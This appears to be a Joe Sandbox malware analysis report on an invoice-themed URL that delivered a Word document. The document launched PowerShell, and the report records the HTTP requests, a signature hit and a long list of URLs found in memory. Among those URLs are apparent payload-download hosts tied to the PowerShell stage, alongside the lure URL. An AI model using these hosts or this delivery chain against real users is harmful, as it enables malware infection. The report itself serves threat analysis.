Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:46214
Start time:21:33:44
Joe Sandbox Product:CloudBasic
Start date:12.02.2018
Overall analysis duration:0h 5m 6s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:browseurl.jbs
Sample URL:http://royal-tec.com/Paid-Invoices
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:10
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection:MAL
Classification:mal72.evad.expl.win@11/29@8/3
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information:Failed
HDC Information:Failed
Cookbook Comments:
  • Adjust boot time
  • URL browsing timeout
Warnings:
Show All
  • Exclude process from analysis (whitelisted): WmiApSrv.exe, conhost.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe


Detection

StrategyScoreRangeReportingDetection
Threshold720 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview

Click to jump to signature section


Software Vulnerabilities:

barindex
Browser exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Networking:

barindex
Downloads filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid-Invoices[1].doc
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /Paid-Invoices HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: royal-tec.comDNT: 1Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Paid-Invoices/ HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: royal-tec.comConnection: Keep-AliveDNT: 1
Found strings which match to known social media urlsShow sources
Source: iexplore.exeString found in binary or memory: <SuggestionsURL>http://ie.search.yahoo.com/os?command={SearchTerms}</SuggestionsURL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <FavoriteIcon>http://search.yahoo.co.jp/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <FavoriteIcon>http://search.yahoo.com/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: iexplore.exeString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: iexplore.exeString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: iexplore.exeString found in binary or memory: <URL>http://br.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://de.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://es.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://espanol.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://fr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://in.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://it.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://kr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://ru.search.yahoo.com</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://sads.myspace.com/</URL> equals www.myspace.com (Myspace)
Source: iexplore.exeString found in binary or memory: <URL>http://search.cn.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://search.yahoo.co.jp</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://tw.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://uk.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: iexplore.exeString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: iecompatdata.xml.0.dr, iecompatviewlist[1].xml.0.drString found in binary or memory: <domain uaString="11">messenger.yahoo.com</domain> equals www.yahoo.com (Yahoo)
Source: iecompatdata.xml.0.dr, iecompatviewlist[1].xml.0.drString found in binary or memory: <domain uaString="Firefox Token NoPlat">login.yahoo.com</domain> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: Free Hotmail.url equals www.hotmail.com (Hotmail)
Source: iexplore.exeString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: royal-tec.com
Urls found in memory or binary dataShow sources
Source: powershell.exeString found in binary or memory: file://
Source: iexplore.exe, powershell.exeString found in binary or memory: file:///
Source: WINWORD.EXEString found in binary or memory: file:///$
Source: WINWORD.EXEString found in binary or memory: file:///C:
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Local/Microsoft/Windows/Temporary%20Internet%20Files/Conte
Source: powershell.exeString found in binary or memory: file:///C:/Windows/Microsoft.NET/Framework/v2.0.50727/T
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/en-US/Microsoft.PowerShell.ConsoleHost.resources/
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/o
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/powershell.config
Source: ver40A7.tmp.1.drString found in binary or memory: http://
Source: iexplore.exeString found in binary or memory: http://%s.com
Source: iexplore.exeString found in binary or memory: http://Trn
Source: powershell.exeString found in binary or memory: http://about.megaxus.com/v1/images/article/IpjKJT/
Source: iexplore.exeString found in binary or memory: http://amazon.fr/
Source: iexplore.exeString found in binary or memory: http://api.bing.com/qsml.aspx?query=
Source: iexplore.exeString found in binary or memory: http://ariadna.elmundo.es/
Source: iexplore.exeString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: iexplore.exeString found in binary or memory: http://arianna.libero.it/
Source: iexplore.exeString found in binary or memory: http://arianna.libero.it/favicon.ico
Source: iexplore.exeString found in binary or memory: http://asp.usatoday.com/
Source: iexplore.exeString found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://auone.jp/favicon.ico
Source: iexplore.exeString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: iexplore.exeString found in binary or memory: http://br.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://browse.guardian.co.uk/
Source: iexplore.exeString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: iexplore.exeString found in binary or memory: http://busca.buscape.com.br/
Source: iexplore.exeString found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: iexplore.exeString found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: iexplore.exeString found in binary or memory: http://busca.igbusca.com.br/
Source: iexplore.exeString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: iexplore.exeString found in binary or memory: http://busca.orange.es/
Source: iexplore.exeString found in binary or memory: http://busca.uol.com.br/
Source: iexplore.exeString found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: iexplore.exeString found in binary or memory: http://buscador.lycos.es/
Source: iexplore.exeString found in binary or memory: http://buscador.terra.com.br/
Source: iexplore.exeString found in binary or memory: http://buscador.terra.com/
Source: iexplore.exeString found in binary or memory: http://buscador.terra.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://buscador.terra.es/
Source: iexplore.exeString found in binary or memory: http://buscar.ozu.es/
Source: iexplore.exeString found in binary or memory: http://buscar.ya.com/
Source: iexplore.exeString found in binary or memory: http://busqueda.aol.com.mx/
Source: iexplore.exeString found in binary or memory: http://cerca.lycos.it/
Source: iexplore.exeString found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: iexplore.exeString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: iexplore.exeString found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: iexplore.exeString found in binary or memory: http://cn.bing.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://cn.bing.com/search?q=
Source: iexplore.exeString found in binary or memory: http://cnet.search.com/
Source: iexplore.exeString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: iexplore.exeString found in binary or memory: http://corp.naukri.com/
Source: iexplore.exeString found in binary or memory: http://corp.naukri.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://crl.comodo.net//J
Source: iexplore.exeString found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: iexplore.exeString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: iexplore.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: iexplore.exeString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: iexplore.exeString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: iexplore.exeString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: iexplore.exeString found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: iexplore.exeString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: iexplore.exeString found in binary or memory: http://crt.comodoca.com/
Source: iexplore.exeString found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: iexplore.exeString found in binary or memory: http://cs.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://cs.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://cs.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: iexplore.exeString found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: iexplore.exeString found in binary or memory: http://de.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://de.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://de.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://de.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://en.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://en.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://en.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: powershell.exeString found in binary or memory: http://er
Source: powershell.exeString found in binary or memory: http://ers
Source: Paid Invoice.doc.usc4tz8.partial.1.drString found in binary or memory: http://ersmgY
Source: powershell.exeString found in binary or memory: http://erst
Source: powershell.exeString found in binary or memory: http://erste.vip/nH0tN/
Source: iexplore.exeString found in binary or memory: http://es.ask.com/
Source: iexplore.exeString found in binary or memory: http://es.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://es.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://es.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://es.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://esearch.rakuten.co.jp/
Source: iexplore.exeString found in binary or memory: http://espanol.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://espn.go.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://find.joins.com/
Source: iexplore.exeString found in binary or memory: http://fr.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://fr.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://fr.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://fr.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://google.pchome.com.tw/
Source: iexplore.exeString found in binary or memory: http://home.altervista.org/
Source: iexplore.exeString found in binary or memory: http://home.altervista.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: iexplore.exeString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: iexplore.exeString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: iexplore.exeString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: iexplore.exeString found in binary or memory: http://images.monster.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://img.atlas.cz/favicon.ico
Source: iexplore.exeString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: iexplore.exeString found in binary or memory: http://in.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://it.search.dada.net/
Source: iexplore.exeString found in binary or memory: http://it.search.dada.net/favicon.ico
Source: iexplore.exeString found in binary or memory: http://it.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://it.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://it.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://it.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://ja.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://ja.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://ja.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: powershell.exeString found in binary or memory: http://java.com/
Source: powershell.exeString found in binary or memory: http://java.com/help
Source: powershell.exeString found in binary or memory: http://java.com/helphttp://java.com/help
Source: powershell.exeString found in binary or memory: http://java.com/http://java.com/
Source: iexplore.exeString found in binary or memory: http://jobsearch.monster.com/
Source: iexplore.exeString found in binary or memory: http://kr.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://list.taobao.com/
Source: iexplore.exeString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: iexplore.exeString found in binary or memory: http://m
Source: iexplore.exeString found in binary or memory: http://mail.live.com/
Source: iexplore.exeString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: iexplore.exeString found in binary or memory: http://msk.afisha.ru/
Source: iexplore.exeString found in binary or memory: http://nl.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://nl.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://nl.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: WINWORD.EXEString found in binary or memory: http://ns.
Source: iexplore.exeString found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: iexplore.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: iexplore.exeString found in binary or memory: http://ocsp.comodoca.com0%
Source: iexplore.exeString found in binary or memory: http://ocsp.comodoca.com0-
Source: iexplore.exeString found in binary or memory: http://ocsp.comodoca.com0/
Source: iexplore.exeString found in binary or memory: http://ocsp.comodoca.com05
Source: iexplore.exe, 6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.0.dr, 6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: iexplore.exeString found in binary or memory: http://ocsp.digicert.com0:
Source: iexplore.exeString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: iexplore.exeString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlVE
Source: iexplore.exeString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlf
Source: iexplore.exeString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crllE
Source: iexplore.exeString found in binary or memory: http://ocsp.entrust.net03
Source: iexplore.exeString found in binary or memory: http://ocsp.entrust.net0D
Source: iexplore.exeString found in binary or memory: http://ocsp.msocsp.com0
Source: iexplore.exeString found in binary or memory: http://ocsp?J
Source: iexplore.exeString found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: iexplore.exeString found in binary or memory: http://p.zhongsou.com/
Source: iexplore.exeString found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://pl.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://pl.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://pl.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://price.ru/
Source: iexplore.exeString found in binary or memory: http://price.ru/favicon.ico
Source: iexplore.exeString found in binary or memory: http://pt.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://pt.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://pt.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://recherche.linternaute.com/
Source: iexplore.exeString found in binary or memory: http://recherche.tf1.fr/
Source: iexplore.exeString found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: iexplore.exeString found in binary or memory: http://rover.ebay.com
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices
Source: iexplore.exe, Paid-Invoices[1].htm.1.drString found in binary or memory: http://royal-tec.com/Paid-Invoices/
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices/#
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices/(
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices/3
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices/:
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices/C:
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices/N
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices5
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-InvoicesB
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-InvoicesH
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-InvoiceshTerms
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/h
Source: iexplore.exeString found in binary or memory: http://ru.search.yahoo.com
Source: iexplore.exeString found in binary or memory: http://ru.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://ru.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://ru.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://sads.myspace.com/
Source: iexplore.exeString found in binary or memory: http://search-dyn.tiscali.it/
Source: iexplore.exeString found in binary or memory: http://search.about.com/
Source: iexplore.exeString found in binary or memory: http://search.alice.it/
Source: iexplore.exeString found in binary or memory: http://search.alice.it/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.aol.co.uk/
Source: iexplore.exeString found in binary or memory: http://search.aol.com/
Source: iexplore.exeString found in binary or memory: http://search.aol.in/
Source: iexplore.exeString found in binary or memory: http://search.atlas.cz/
Source: iexplore.exeString found in binary or memory: http://search.auction.co.kr/
Source: iexplore.exeString found in binary or memory: http://search.auone.jp/
Source: iexplore.exeString found in binary or memory: http://search.books.com.tw/
Source: iexplore.exeString found in binary or memory: http://search.books.com.tw/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.centrum.cz/
Source: iexplore.exeString found in binary or memory: http://search.centrum.cz/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.chol.com/
Source: iexplore.exeString found in binary or memory: http://search.chol.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.cn.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://search.daum.net/
Source: iexplore.exeString found in binary or memory: http://search.daum.net/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.dreamwiz.com/
Source: iexplore.exeString found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.ebay.co.uk/
Source: iexplore.exeString found in binary or memory: http://search.ebay.com/
Source: iexplore.exeString found in binary or memory: http://search.ebay.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.ebay.de/
Source: iexplore.exeString found in binary or memory: http://search.ebay.es/
Source: iexplore.exeString found in binary or memory: http://search.ebay.fr/
Source: iexplore.exeString found in binary or memory: http://search.ebay.in/
Source: iexplore.exeString found in binary or memory: http://search.ebay.it/
Source: iexplore.exeString found in binary or memory: http://search.empas.com/
Source: iexplore.exeString found in binary or memory: http://search.empas.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.espn.go.com/
Source: iexplore.exeString found in binary or memory: http://search.gamer.com.tw/
Source: iexplore.exeString found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.gismeteo.ru/
Source: iexplore.exeString found in binary or memory: http://search.goo.ne.jp/
Source: iexplore.exeString found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.hanafos.com/
Source: iexplore.exeString found in binary or memory: http://search.hanafos.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.interpark.com/
Source: iexplore.exeString found in binary or memory: http://search.ipop.co.kr/
Source: iexplore.exeString found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: iexplore.exeString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: iexplore.exeString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: iexplore.exeString found in binary or memory: http://search.live.com/results.aspx?q=
Source: iexplore.exeString found in binary or memory: http://search.livedoor.com/
Source: iexplore.exeString found in binary or memory: http://search.livedoor.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.lycos.co.uk/
Source: iexplore.exeString found in binary or memory: http://search.lycos.com/
Source: iexplore.exeString found in binary or memory: http://search.lycos.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: iexplore.exeString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: iexplore.exeString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: iexplore.exeString found in binary or memory: http://search.msn.com/results.aspx?q=
Source: iexplore.exeString found in binary or memory: http://search.nate.com/
Source: iexplore.exeString found in binary or memory: http://search.naver.com/
Source: iexplore.exeString found in binary or memory: http://search.naver.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.nifty.com/
Source: iexplore.exeString found in binary or memory: http://search.orange.co.uk/
Source: iexplore.exeString found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.rediff.com/
Source: iexplore.exeString found in binary or memory: http://search.rediff.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.seznam.cz/
Source: iexplore.exeString found in binary or memory: http://search.seznam.cz/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.sify.com/
Source: iexplore.exeString found in binary or memory: http://search.yahoo.co.jp
Source: iexplore.exeString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://search.yahoo.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: iexplore.exeString found in binary or memory: http://search.yam.com/
Source: iexplore.exeString found in binary or memory: http://search1.taobao.com/
Source: iexplore.exeString found in binary or memory: http://search2.estadao.com.br/
Source: iexplore.exeString found in binary or memory: http://searchresults.news.com.au/
Source: iexplore.exeString found in binary or memory: http://service2.bfast.com/
Source: iexplore.exeString found in binary or memory: http://si.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://si.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://si.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: iexplore.exeString found in binary or memory: http://so-net.search.goo.ne.jp/
Source: iexplore.exeString found in binary or memory: http://suche.aol.de/
Source: iexplore.exeString found in binary or memory: http://suche.freenet.de/
Source: iexplore.exeString found in binary or memory: http://suche.freenet.de/favicon.ico
Source: iexplore.exeString found in binary or memory: http://suche.lycos.de/
Source: iexplore.exeString found in binary or memory: http://suche.t-online.de/
Source: iexplore.exeString found in binary or memory: http://suche.web.de/
Source: iexplore.exeString found in binary or memory: http://suche.web.de/favicon.ico
Source: powershell.exeString found in binary or memory: http://tceele.com/NCbJ/
Source: iexplore.exeString found in binary or memory: http://treyresearch.net
Source: iexplore.exeString found in binary or memory: http://tw.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://udn.com/
Source: iexplore.exeString found in binary or memory: http://udn.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://uk.ask.com/
Source: iexplore.exeString found in binary or memory: http://uk.ask.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://uk.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://vachercher.lycos.fr/
Source: iexplore.exeString found in binary or memory: http://video.globo.com/
Source: iexplore.exeString found in binary or memory: http://video.globo.com/favicon.ico
Source: WINWORD.EXEString found in binary or memory: http://w
Source: iexplore.exeString found in binary or memory: http://web.ask.com/
Source: iexplore.exeString found in binary or memory: http://www.%s.com
Source: iexplore.exeString found in binary or memory: http://www.abril.com.br/
Source: iexplore.exeString found in binary or memory: http://www.abril.com.br/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.alarabiya.net/
Source: iexplore.exeString found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.amazon.co.jp/
Source: iexplore.exeString found in binary or memory: http://www.amazon.co.uk/
Source: iexplore.exeString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: iexplore.exeString found in binary or memory: http://www.amazon.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: iexplore.exeString found in binary or memory: http://www.amazon.de/
Source: iexplore.exeString found in binary or memory: http://www.aol.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.arrakis.com/
Source: iexplore.exeString found in binary or memory: http://www.arrakis.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.asharqalawsat.com/
Source: iexplore.exeString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.ask.com/
Source: iexplore.exeString found in binary or memory: http://www.auction.co.kr/auction.ico
Source: iexplore.exeString found in binary or memory: http://www.baidu.com/
Source: iexplore.exeString found in binary or memory: http://www.baidu.com/favicon.ico
Source: iexplore.exe, iecompatdata.xml.0.dr, iecompatviewlist[1].xml.0.drString found in binary or memory: http://www.bing.com/bingbot.htm)
Source: iexplore.exeString found in binary or memory: http://www.bing.com/bingbot.htm)D
Source: iexplore.exeString found in binary or memory: http://www.bing.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://www.bing.com/favicon.icoA33DD
Source: iexplore.exeString found in binary or memory: http://www.bing.com/favicon.icoLinkID=403856&language=
Source: iexplore.exeString found in binary or memory: http://www.bing.com/favicon.icoa
Source: iexplore.exeString found in binary or memory: http://www.bing.com/favicon.icoj
